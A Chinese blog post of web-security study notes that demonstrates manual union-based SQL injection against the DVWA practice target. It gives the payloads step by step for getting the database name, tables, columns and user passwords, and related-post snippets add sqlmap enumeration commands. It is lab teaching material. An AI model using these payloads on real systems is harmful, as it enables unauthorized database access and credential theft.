web安全学习笔记(三)——SQL注入靶机测试

最新推荐文章于 2024-04-29 20:54:11 发布
最新推荐文章于 2024-04-29 20:54:11 发布
阅读量982 收藏 3
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jokerhappy/article/details/106726490
版权

今天尝试了SQL注入靶机爆库爆表操作,分享如下:
1.设置靶机安全级别为低级
low
2.进入SQL注入界面
SQL注入界面
3.输入1提交
输入1提交
3.用单引号让id闭合,输入1’ union select 1, database()#(此处做补充说明下,语句闭合时在数据库执行的SQL语句如下:“select frist_name,surname from 表名 where user_ID=‘1’ union select 1,database()”,所以构架关联的时候字段为2,获取你所需要获得的信息;如只有一个就加上1或其他,补足关联表后所需字段内容。)
爆出数据库名称
4.既然知道了数据库,就尝试爆出数据库中的表,输入
1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
爆表
5.爆出表名如上图所示,尝试爆出users表的列,输入
1’ union select 1,column_name from information_schema.columns where table_name=‘users’#
爆列
6.关注该表中的关键字段id和password,尝试爆数据,输入
1’ union select user_id,password from users#
爆数据
该内容仅用于学习,请遵守国家相关法律法规,不要将技术用于非法行径,学习时请不要对网站进行操作,共同维护绿色网络环境,请使用靶机进行练习。

joker的暴击
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php mysql注入靶机_兽哥出品---->sqlmap注入,杀入靶机
weixin_31887421的博客
01-30 159
Sqlmap 实践----->怼自己的靶机今天兽哥准备拿出来点干货给大家尝尝,是咸是甜自任君品尝靶机之前已经文章说过 用phpstudy 链接 dvwa 搭建一个环境而后呢,我们要使用抓包软件抓一下dvwa的cookie让我们先来看一下演示:首先进入dvwa将难度设置为low(为了演示方便)接着呢要使用用抓包 抓出dvwa登录时的cookie首先配置代理,在这里呢 我设置代理端口为默认:8...
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
NCNIPC-靶场介绍&&Django SQL注入(CVE-2021-35042)
03-01 2321
NCNIPC-中国科学院研究生院国家计算机网络入侵防范中心 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息安全管理办公室(以下简称国信安办)的依靠力量,承担和协调国内各种黑客事件的防范处理,协助国信安办完成关键部分的应急处理任务,协助解决社会上的应急/救援组织难以解决的网络安全疑难问题,是国家计算机网络应急处理体系中心的重要部门。 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息
网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
最新发布
2401_84253132的博客
04-29 922
这样的话估计不能使用Error注入。结论:字段为2。
SQL注入靶机演示)
qq_50646540的博客
09-14 2138
如何安装sqlmap 先安装一个软件,叫sqlmap,用于自动化注入。 下载之后根据需求放进文件夹内,文件夹最好用英文,方便之后创建快捷方式。 将下载下来的sqlmap移动到Python的文件夹下,再在桌面创建快捷方式,将快捷方式的目标改为cmd,起始位置就是Python文件下的sqlmap。完成后可以先测试一下。 在快捷方式的界面中,输入sqlmap.py -h,有下图中的结果就是装好了。 安装好之后就可以开始使用了。 首先,去找一个有漏洞的网站试手,我这边是学校里的靶机。 先进行一个测试,在网址后面加
SQL注入实验——web靶机第一关
qq_41554179的博客
03-09 2957
测试交互方法(此靶机为get); 判断字符类型;(此靶机没报错,为字符型) 构造闭合(次靶机闭合为 ‘ ); 爆库名; http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+ 爆表名; http://192.168.96.133/sqli-labs-master/L...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我...本文演示从web界面注入SQL命令的方法,但不会直接连接到数据库,而是想办法使后端数据库处理程序将我们的查询语句当作SQL命令去执行。本文先描述一
OWASP靶机安全学习测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
安装部署Web安全测试用的靶机
11-24
本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是一个集成的Web服务器套件,包含了Apache、MySQL、PHP和Perl等组件...
Web应用安全:使用SQL注入攻击篡改数据实验.doc
06-20
Web应用安全SQL注入攻击篡改数据】 SQL注入攻击是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的数据访问或控制系统。本实验旨在让学生了解并实践SQL注入的...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
靶机网站实现简单SQL注入
真正的大师,永远都怀着一颗学徒的心。
07-15 1755
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、sql注入是什么?二、注入过程1.明确SQL注入总体思路(1)寻找注入点(2)判断后台数据库类型和服务器的类型(3)针对不同的数据库和服务器类型构建语句进行注入2.进行站点分析(1)判断注入-最经典的and 1=1(2)判断该表当前页面字段数(3)确定当前页面回显(4)在第个字段处构建语句,获取库名,字段名,表名。(5)到此为止,我们已经可以通过表名和字段名查询到管理员的账号密码了(6)进入后台看是否能够成功登陆。总结
php mysql注入靶机_SQL注入靶机实例
weixin_42365510的博客
01-30 237
打开靶机右键源代码 习惯搜一下index 发现php 大概率为MYSQL数据库点击index.php后发现新建一个网页和之前的一样 结论这个index.php就是靶机判断是否存在注入点发现url上有id=1 又是MYSQL数据库 心中窃喜 就可以想到select * from [表] where id=[任何数字]接下来把id=后改成0+1 看看有没有发现果然有戏 发现跟原来界面相同 说明0...
sqli-labs靶机搭建
weixin_45784586的博客
02-02 1551
在学sql注入,用线上的sqli靶机只能回显报错(这对新手不太友好),想着如果能过回显sql语句就好了,于是打算自己搭建一个sqli-labs靶机 下载地址 github上下载sqli的源代码这里 phpstudy下载这里 搭建过程 首先,在github上下载下来zip文件解压 将该文件拖到phpstudy的www文件目录并且起一个比较简便的名字(我的是sqli) 配置phpstudy 打开mys...
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 994
手把手带你飞,在DVWA靶机上练习sql注入
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 313
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
SQL手工注入(MySQL数据库)详解---靶机(墨者学院)
CSDN_caiqian的博客
03-02 4398
SQL手工注入详解一、判断是否存在注入点二、Mysql数据库基本结构、information_schema 简述 一、判断是否存在注入点 如果页面中MySQL报错,证明该页面中存在SQL注入漏洞: 单引号 ’ ----> 页面错误 and 1=1 ----> 页面正常 and 1=2 ----> 页面错误 二、Mysql数据库基本结构 MYSQL数据库   数据库A=网站A=数据库用户A     表名           列名              
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6229
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
SQL注入渗透与防御
yk2909438315的博客
07-10 2010
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。web应用程序:移动端的app或PC端的网站网页。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值